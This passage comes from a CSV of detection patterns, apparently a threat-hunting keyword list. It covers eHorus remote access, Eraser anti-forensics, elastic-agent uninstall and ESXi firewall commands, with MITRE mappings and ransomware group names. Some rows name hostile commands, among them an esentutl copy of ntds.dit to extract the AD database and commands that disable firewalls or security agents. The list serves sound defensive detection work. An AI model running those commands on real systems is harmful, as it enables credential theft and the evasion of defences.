VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\ehorus_launcher.exe*",".{0,1000}\\ehorus_launcher\.exe.{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. 
(server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\ehorus_uit.exe*",".{0,1000}\\ehorus_uit\.exe.{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. (server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\eHorusMsiCustomActions.dll*",".{0,1000}\\eHorusMsiCustomActions\.dll.{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. (server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Microsoft\Windows\Start Menu\Programs\eHorus Agent\*",".{0,1000}\\Microsoft\\Windows\\Start\sMenu\\Programs\\eHorus\sAgent\\.{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. 
(server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Program Files\ehorus_agent\*",".{0,1000}\\Program\sFiles\\ehorus_agent\\.{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. (server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\SOFTWARE\eHorusDispl\*",".{0,1000}\\SOFTWARE\\eHorusDispl\\.{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. (server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","0","#registry","N/A","10","10","N/A","N/A","N/A","N/A" "*\System\CurrentControlSet\Services\ehorus*",".{0,1000}\\System\\CurrentControlSet\\Services\\ehorus.{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. 
(server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","0","#registry","N/A","10","10","N/A","N/A","N/A","N/A" "*\System\CurrentControlSet\Services\EHORUSAGENT*",".{0,1000}\\System\\CurrentControlSet\\Services\\EHORUSAGENT.{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. (server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","0","#registry","N/A","10","10","N/A","N/A","N/A","N/A" "*>eHorus Agent Setup<*",".{0,1000}\>eHorus\sAgent\sSetup\<.{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. (server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","0","#description","N/A","10","10","N/A","N/A","N/A","N/A" "*>EHORUSAGENT<*",".{0,1000}\>EHORUSAGENT\<.{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. 
(server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","0","#servicename","N/A","10","10","N/A","N/A","N/A","N/A" "*chsh -s /bin/false ehorus*",".{0,1000}chsh\s\-s\s\/bin\/false\sehorus.{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. (server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*ehorus_agent -f /etc/ehorus/*",".{0,1000}ehorus_agent\s\-f\s\/etc\/ehorus\/.{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. (server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*https://portal.ehorus.com/#/agents/*",".{0,1000}https\:\/\/portal\.ehorus\.com\/\#\/agents\/.{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. 
(server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*hub.ehorus.com",".{0,1000}hub\.ehorus\.com","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. (server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc delete ehorus*",".{0,1000}sc\sdelete\sehorus.{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. (server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc stop ehorus*",".{0,1000}sc\sstop\sehorus.{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. 
(server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*su ehorus -s /bin/bash -c ""kill -9 -1""*",".{0,1000}su\sehorus\s\-s\s\/bin\/bash\s\-c\s\""kill\s\-9\s\-1\"".{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. (server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*switch.ehorus.com*",".{0,1000}switch\.ehorus\.com.{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. (server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*taskkill /F /IM ""ehorus_agent.exe""*",".{0,1000}taskkill\s\/F\s\/IM\s\""ehorus_agent\.exe\"".{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. 
(server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*taskkill /F /IM ""ehorus_cmd.exe""*",".{0,1000}taskkill\s\/F\s\/IM\s\""ehorus_cmd\.exe\"".{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. (server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*taskkill /F /IM ""ehorus_display.exe""*",".{0,1000}taskkill\s\/F\s\/IM\s\""ehorus_display\.exe\"".{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. (server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*umount /usr/share/ehorus/.gvfs -r >/dev/null 2>&1*",".{0,1000}umount\s\/usr\/share\/ehorus\/\.gvfs\s\-r\s\>\/dev\/null\s2\>\&1.{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. 
(server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*useradd -d /usr/share/ehorus -p * ehorus*",".{0,1000}useradd\s\-d\s\/usr\/share\/ehorus\s\-p\s.{0,1000}\sehorus.{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. (server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*elastic-agent.exe uninstall*",".{0,1000}elastic\-agent\.exe\suninstall.{0,1000}","greyware_tool_keyword","elastic-agent","uninstall elastic-agent from the system","T1562.004 - T1070.004","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","6","8","N/A","N/A","N/A","N/A" "*https://www.email-format.com/d/*",".{0,1000}https\:\/\/www\.email\-format\.com\/d\/.{0,1000}","greyware_tool_keyword","email-format","used by attackers to find information about a company's users","T1593 - T1596 - T1213","TA0009","N/A","N/A","Reconnaissance","https://www.email-format.com","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* erase /quiet /method=* data dir=*",".{0,1000}\serase\s\/quiet\s\/method\=.{0,1000}\sdata\sdir\=.{0,1000}","greyware_tool_keyword","eraser","It completely removes sensitive data from your hard drive by overwriting it several times with carefully selected patterns - abused by attackers for anti-forensics","T1070 - T1488 - T1561","TA0005","N/A","BlackSuit - Royal","Defense Evasion","https://sourceforge.net/projects/eraser","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A" "* erase /quiet /methodName=* data 
dir=*",".{0,1000}\serase\s\/quiet\s\/methodName\=.{0,1000}\sdata\sdir\=.{0,1000}","greyware_tool_keyword","eraser","It completely removes sensitive data from your hard drive by overwriting it several times with carefully selected patterns - abused by attackers for anti-forensics","T1070 - T1488 - T1561","TA0005","N/A","BlackSuit - Royal","Defense Evasion","https://sourceforge.net/projects/eraser","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A" "*/Eraser 5.8.8.exe*",".{0,1000}\/Eraser\s5\.8\.8\.exe.{0,1000}","greyware_tool_keyword","eraser","It completely removes sensitive data from your hard drive by overwriting it several times with carefully selected patterns - abused by attackers for anti-forensics","T1070 - T1488 - T1561","TA0005","N/A","BlackSuit - Royal","Defense Evasion","https://sourceforge.net/projects/eraser","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A" "*/Eraser 6.0.10.2620.exe*",".{0,1000}\/Eraser\s6\.0\.10\.2620\.exe.{0,1000}","greyware_tool_keyword","eraser","It completely removes sensitive data from your hard drive by overwriting it several times with carefully selected patterns - abused by attackers for anti-forensics","T1070 - T1488 - T1561","TA0005","N/A","BlackSuit - Royal","Defense Evasion","https://sourceforge.net/projects/eraser","1","1","N/A","N/A","7","10","N/A","N/A","N/A","N/A" "*/Eraser 6.0.8.2273.exe*",".{0,1000}\/Eraser\s6\.0\.8\.2273\.exe.{0,1000}","greyware_tool_keyword","eraser","It completely removes sensitive data from your hard drive by overwriting it several times with carefully selected patterns - abused by attackers for anti-forensics","T1070 - T1488 - T1561","TA0005","N/A","BlackSuit - Royal","Defense Evasion","https://sourceforge.net/projects/eraser","1","1","N/A","N/A","7","10","N/A","N/A","N/A","N/A" "*/Eraser 6.0.9.2343.exe*",".{0,1000}\/Eraser\s6\.0\.9\.2343\.exe.{0,1000}","greyware_tool_keyword","eraser","It completely removes sensitive data from your hard drive by overwriting it several times with carefully 
selected patterns - abused by attackers for anti-forensics","T1070 - T1488 - T1561","TA0005","N/A","BlackSuit - Royal","Defense Evasion","https://sourceforge.net/projects/eraser","1","1","N/A","N/A","7","10","N/A","N/A","N/A","N/A" "*/Eraser 6.2.0.2994.exe*",".{0,1000}\/Eraser\s6\.2\.0\.2994\.exe.{0,1000}","greyware_tool_keyword","eraser","It completely removes sensitive data from your hard drive by overwriting it several times with carefully selected patterns - abused by attackers for anti-forensics","T1070 - T1488 - T1561","TA0005","N/A","BlackSuit - Royal","Defense Evasion","https://sourceforge.net/projects/eraser","1","1","N/A","N/A","7","10","N/A","N/A","N/A","N/A" "*/EraserSetup.exe*",".{0,1000}\/EraserSetup\.exe.{0,1000}","greyware_tool_keyword","eraser","It completely removes sensitive data from your hard drive by overwriting it several times with carefully selected patterns - abused by attackers for anti-forensics","T1070 - T1488 - T1561","TA0005","N/A","BlackSuit - Royal","Defense Evasion","https://sourceforge.net/projects/eraser","1","1","N/A","N/A","7","10","N/A","N/A","N/A","N/A" "*\AppData\Local\Temp\eraserInstallBootstrapper\*",".{0,1000}\\AppData\\Local\\Temp\\eraserInstallBootstrapper\\.{0,1000}","greyware_tool_keyword","eraser","It completely removes sensitive data from your hard drive by overwriting it several times with carefully selected patterns - abused by attackers for anti-forensics","T1070 - T1488 - T1561","TA0005","N/A","BlackSuit - Royal","Defense Evasion","https://sourceforge.net/projects/eraser","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A" "*\Eraser (x64).msi*",".{0,1000}\\Eraser\s\(x64\)\.msi.{0,1000}","greyware_tool_keyword","eraser","It completely removes sensitive data from your hard drive by overwriting it several times with carefully selected patterns - abused by attackers for anti-forensics","T1070 - T1488 - T1561","TA0005","N/A","BlackSuit - Royal","Defense 
Evasion","https://sourceforge.net/projects/eraser","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A" "*\Eraser (x86).msi*",".{0,1000}\\Eraser\s\(x86\)\.msi.{0,1000}","greyware_tool_keyword","eraser","It completely removes sensitive data from your hard drive by overwriting it several times with carefully selected patterns - abused by attackers for anti-forensics","T1070 - T1488 - T1561","TA0005","N/A","BlackSuit - Royal","Defense Evasion","https://sourceforge.net/projects/eraser","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A" "*\Eraser 5.8.8.exe",".{0,1000}\\Eraser\s5\.8\.8\.exe","greyware_tool_keyword","eraser","It completely removes sensitive data from your hard drive by overwriting it several times with carefully selected patterns - abused by attackers for anti-forensics","T1070 - T1488 - T1561","TA0005","N/A","BlackSuit - Royal","Defense Evasion","https://sourceforge.net/projects/eraser","1","1","N/A","N/A","7","10","N/A","N/A","N/A","N/A" "*\Eraser 6.0.10.2620.exe*",".{0,1000}\\Eraser\s6\.0\.10\.2620\.exe.{0,1000}","greyware_tool_keyword","eraser","It completely removes sensitive data from your hard drive by overwriting it several times with carefully selected patterns - abused by attackers for anti-forensics","T1070 - T1488 - T1561","TA0005","N/A","BlackSuit - Royal","Defense Evasion","https://sourceforge.net/projects/eraser","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A" "*\Eraser 6.0.8.2273.exe*",".{0,1000}\\Eraser\s6\.0\.8\.2273\.exe.{0,1000}","greyware_tool_keyword","eraser","It completely removes sensitive data from your hard drive by overwriting it several times with carefully selected patterns - abused by attackers for anti-forensics","T1070 - T1488 - T1561","TA0005","N/A","BlackSuit - Royal","Defense Evasion","https://sourceforge.net/projects/eraser","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A" "*\Eraser 6.0.9.2343.exe*",".{0,1000}\\Eraser\s6\.0\.9\.2343\.exe.{0,1000}","greyware_tool_keyword","eraser","It completely removes sensitive 
data from your hard drive by overwriting it several times with carefully selected patterns - abused by attackers for anti-forensics","T1070 - T1488 - T1561","TA0005","N/A","BlackSuit - Royal","Defense Evasion","https://sourceforge.net/projects/eraser","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A" "*\Eraser 6.2.0.2994.exe*",".{0,1000}\\Eraser\s6\.2\.0\.2994\.exe.{0,1000}","greyware_tool_keyword","eraser","It completely removes sensitive data from your hard drive by overwriting it several times with carefully selected patterns - abused by attackers for anti-forensics","T1070 - T1488 - T1561","TA0005","N/A","BlackSuit - Royal","Defense Evasion","https://sourceforge.net/projects/eraser","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A" "*\EraserSetup.exe*",".{0,1000}\\EraserSetup\.exe.{0,1000}","greyware_tool_keyword","eraser","It completely removes sensitive data from your hard drive by overwriting it several times with carefully selected patterns - abused by attackers for anti-forensics","T1070 - T1488 - T1561","TA0005","N/A","BlackSuit - Royal","Defense Evasion","https://sourceforge.net/projects/eraser","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A" "*\Microsoft\Windows\CurrentVersion\Run\Eraser*",".{0,1000}\\Microsoft\\Windows\\CurrentVersion\\Run\\Eraser.{0,1000}","greyware_tool_keyword","eraser","It completely removes sensitive data from your hard drive by overwriting it several times with carefully selected patterns - abused by attackers for anti-forensics","T1070 - T1488 - T1561","TA0005","N/A","BlackSuit - Royal","Defense Evasion","https://sourceforge.net/projects/eraser","1","0","#registry","N/A","7","10","N/A","N/A","N/A","N/A" "*\Microsoft\Windows\Start Menu\Programs\Eraser\Eraser.lnk*",".{0,1000}\\Microsoft\\Windows\\Start\sMenu\\Programs\\Eraser\\Eraser\.lnk.{0,1000}","greyware_tool_keyword","eraser","It completely removes sensitive data from your hard drive by overwriting it several times with carefully selected patterns - abused by attackers for 
anti-forensics","T1070 - T1488 - T1561","TA0005","N/A","BlackSuit - Royal","Defense Evasion","https://sourceforge.net/projects/eraser","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A" "*\Program Files\Eraser\*",".{0,1000}\\Program\sFiles\\Eraser\\.{0,1000}","greyware_tool_keyword","eraser","It completely removes sensitive data from your hard drive by overwriting it several times with carefully selected patterns - abused by attackers for anti-forensics","T1070 - T1488 - T1561","TA0005","N/A","BlackSuit - Royal","Defense Evasion","https://sourceforge.net/projects/eraser","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A" "*\Public\Desktop\Eraser.lnk*",".{0,1000}\\Public\\Desktop\\Eraser\.lnk.{0,1000}","greyware_tool_keyword","eraser","It completely removes sensitive data from your hard drive by overwriting it several times with carefully selected patterns - abused by attackers for anti-forensics","T1070 - T1488 - T1561","TA0005","N/A","BlackSuit - Royal","Defense Evasion","https://sourceforge.net/projects/eraser","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A" "*\Windows\Start Menu\Programs\Eraser\Eraser Verify.lnk*",".{0,1000}\\Windows\\Start\sMenu\\Programs\\Eraser\\Eraser\sVerify\.lnk.{0,1000}","greyware_tool_keyword","eraser","It completely removes sensitive data from your hard drive by overwriting it several times with carefully selected patterns - abused by attackers for anti-forensics","T1070 - T1488 - T1561","TA0005","N/A","BlackSuit - Royal","Defense Evasion","https://sourceforge.net/projects/eraser","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A" "*\Windows\Start Menu\Programs\Eraser\Eraser Website.url*",".{0,1000}\\Windows\\Start\sMenu\\Programs\\Eraser\\Eraser\sWebsite\.url.{0,1000}","greyware_tool_keyword","eraser","It completely removes sensitive data from your hard drive by overwriting it several times with carefully selected patterns - abused by attackers for anti-forensics","T1070 - T1488 - T1561","TA0005","N/A","BlackSuit - Royal","Defense 
Evasion","https://sourceforge.net/projects/eraser","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A" "*>Eraser - Secure Information Removal Tool<*",".{0,1000}\>Eraser\s\-\sSecure\sInformation\sRemoval\sTool\<.{0,1000}","greyware_tool_keyword","eraser","It completely removes sensitive data from your hard drive by overwriting it several times with carefully selected patterns - abused by attackers for anti-forensics","T1070 - T1488 - T1561","TA0005","N/A","BlackSuit - Royal","Defense Evasion","https://sourceforge.net/projects/eraser","1","0","#description","N/A","7","10","N/A","N/A","N/A","N/A" "*>Eraser Setup Bootstrapper<*",".{0,1000}\>Eraser\sSetup\sBootstrapper\<.{0,1000}","greyware_tool_keyword","eraser","It completely removes sensitive data from your hard drive by overwriting it several times with carefully selected patterns - abused by attackers for anti-forensics","T1070 - T1488 - T1561","TA0005","N/A","BlackSuit - Royal","Defense Evasion","https://sourceforge.net/projects/eraser","1","0","#description","N/A","7","10","N/A","N/A","N/A","N/A" "*47e484261a88ba1a895699d8ff0239e1f5089b4a96128e8e610e2b41a9bd4605*",".{0,1000}47e484261a88ba1a895699d8ff0239e1f5089b4a96128e8e610e2b41a9bd4605.{0,1000}","greyware_tool_keyword","eraser","It completely removes sensitive data from your hard drive by overwriting it several times with carefully selected patterns - abused by attackers for anti-forensics","T1070 - T1488 - T1561","TA0005","N/A","BlackSuit - Royal","Defense Evasion","https://sourceforge.net/projects/eraser","1","0","#filehash","N/A","7","10","N/A","N/A","N/A","N/A" "*491301f6b3bc5074f978eb8ad5629923be5e5a750f43d7df96fc9c48612a0016*",".{0,1000}491301f6b3bc5074f978eb8ad5629923be5e5a750f43d7df96fc9c48612a0016.{0,1000}","greyware_tool_keyword","eraser","It completely removes sensitive data from your hard drive by overwriting it several times with carefully selected patterns - abused by attackers for anti-forensics","T1070 - T1488 - T1561","TA0005","N/A","BlackSuit - 
Royal","Defense Evasion","https://sourceforge.net/projects/eraser","1","0","#filehash","N/A","7","10","N/A","N/A","N/A","N/A" "*4ce2ba1b4eabaf58b763ac456397b43ece17e9803e806bf405b28c386a484f6a*",".{0,1000}4ce2ba1b4eabaf58b763ac456397b43ece17e9803e806bf405b28c386a484f6a.{0,1000}","greyware_tool_keyword","eraser","It completely removes sensitive data from your hard drive by overwriting it several times with carefully selected patterns - abused by attackers for anti-forensics","T1070 - T1488 - T1561","TA0005","N/A","BlackSuit - Royal","Defense Evasion","https://sourceforge.net/projects/eraser","1","0","#filehash","N/A","7","10","N/A","N/A","N/A","N/A" "*9d3a9deeeac5f53514e20f1a6dacd125ddec7e17e18d27c23a276ed5eb608878*",".{0,1000}9d3a9deeeac5f53514e20f1a6dacd125ddec7e17e18d27c23a276ed5eb608878.{0,1000}","greyware_tool_keyword","eraser","It completely removes sensitive data from your hard drive by overwriting it several times with carefully selected patterns - abused by attackers for anti-forensics","T1070 - T1488 - T1561","TA0005","N/A","BlackSuit - Royal","Defense Evasion","https://sourceforge.net/projects/eraser","1","0","#filehash","N/A","7","10","N/A","N/A","N/A","N/A" "*a03578a6b28aff267f20a87755696a91a1d5b923e815b2989e4afcc8915cc357*",".{0,1000}a03578a6b28aff267f20a87755696a91a1d5b923e815b2989e4afcc8915cc357.{0,1000}","greyware_tool_keyword","eraser","It completely removes sensitive data from your hard drive by overwriting it several times with carefully selected patterns - abused by attackers for anti-forensics","T1070 - T1488 - T1561","TA0005","N/A","BlackSuit - Royal","Defense Evasion","https://sourceforge.net/projects/eraser","1","0","#filehash","N/A","7","10","N/A","N/A","N/A","N/A" "*a09787812790b59ec3d36120788ae9f80b7bdda1e2d7a17a46d8112324632737",".{0,1000}a09787812790b59ec3d36120788ae9f80b7bdda1e2d7a17a46d8112324632737","greyware_tool_keyword","eraser","It completely removes sensitive data from your hard drive by overwriting it several times with carefully 
selected patterns - abused by attackers for anti-forensics","T1070 - T1488 - T1561","TA0005","N/A","BlackSuit - Royal","Defense Evasion","https://sourceforge.net/projects/eraser","1","0","#filehash","N/A","7","10","N/A","N/A","N/A","N/A" "*bbc22b7149e74ee2ca344ebc55207e6bae4837b77857c7e9ef9e16682d7c8c49*",".{0,1000}bbc22b7149e74ee2ca344ebc55207e6bae4837b77857c7e9ef9e16682d7c8c49.{0,1000}","greyware_tool_keyword","eraser","It completely removes sensitive data from your hard drive by overwriting it several times with carefully selected patterns - abused by attackers for anti-forensics","T1070 - T1488 - T1561","TA0005","N/A","BlackSuit - Royal","Defense Evasion","https://sourceforge.net/projects/eraser","1","0","#filehash","N/A","7","10","N/A","N/A","N/A","N/A" "*ee4026fe96e047558bedd20cf870d1f8348beb91a2c88fbf4cedd6357e316f1d*",".{0,1000}ee4026fe96e047558bedd20cf870d1f8348beb91a2c88fbf4cedd6357e316f1d.{0,1000}","greyware_tool_keyword","eraser","It completely removes sensitive data from your hard drive by overwriting it several times with carefully selected patterns - abused by attackers for anti-forensics","T1070 - T1488 - T1561","TA0005","N/A","BlackSuit - Royal","Defense Evasion","https://sourceforge.net/projects/eraser","1","0","#filehash","N/A","7","10","N/A","N/A","N/A","N/A" "*Eraser.exe addtask *",".{0,1000}Eraser\.exe\saddtask\s.{0,1000}","greyware_tool_keyword","eraser","It completely removes sensitive data from your hard drive by overwriting it several times with carefully selected patterns - abused by attackers for anti-forensics","T1070 - T1488 - T1561","TA0005","N/A","BlackSuit - Royal","Defense Evasion","https://sourceforge.net/projects/eraser","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A" "*PortableApps.com/EraserPortable*",".{0,1000}PortableApps\.com\/EraserPortable.{0,1000}","greyware_tool_keyword","eraser","It completely removes sensitive data from your hard drive by overwriting it several times with carefully selected patterns - abused by attackers 
for anti-forensics","T1070 - T1488 - T1561","TA0005","N/A","BlackSuit - Royal","Defense Evasion","https://sourceforge.net/projects/eraser","1","1","N/A","N/A","7","10","N/A","N/A","N/A","N/A" "*sourceforge.net/projects/eraser/files/Eraser*/download*",".{0,1000}sourceforge\.net\/projects\/eraser\/files\/Eraser.{0,1000}\/download.{0,1000}","greyware_tool_keyword","eraser","It completely removes sensitive data from your hard drive by overwriting it several times with carefully selected patterns - abused by attackers for anti-forensics","T1070 - T1488 - T1561","TA0005","N/A","BlackSuit - Royal","Defense Evasion","https://sourceforge.net/projects/eraser","1","1","N/A","N/A","7","10","N/A","N/A","N/A","N/A" "*esentutl.exe /y /vss *:\windows\ntds\ntds.dit*",".{0,1000}esentutl\.exe\s\/y\s\/vss\s.{0,1000}\:\\windows\\ntds\\ntds\.dit.{0,1000}","greyware_tool_keyword","esentutl","extract the AD Database","T1005 - T1006 - T1564.004 - T1105 - T1570 - T1003.003","TA0006 - TA0005 - TA0003 - TA0010","N/A","Chimera - menuPass","Credential Access","https://lolbas-project.github.io/lolbas/Binaries/Esentutl/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*esxcli network firewall set -enabled f*",".{0,1000}esxcli\snetwork\sfirewall\sset\s\-enabled\sf.{0,1000}","greyware_tool_keyword","esxcli","commands used by ransomware targeting ESXi hosts","T1562.004 - T1070.003","TA0005 ","N/A","N/A","Defense Evasion","https://medium.com/detect-fyi/detecting-and-responding-to-esxi-compromise-with-splunk-f33998ce7823","1","0","N/A","N/A","8","9","N/A","N/A","N/A","N/A" "*esxcli system account 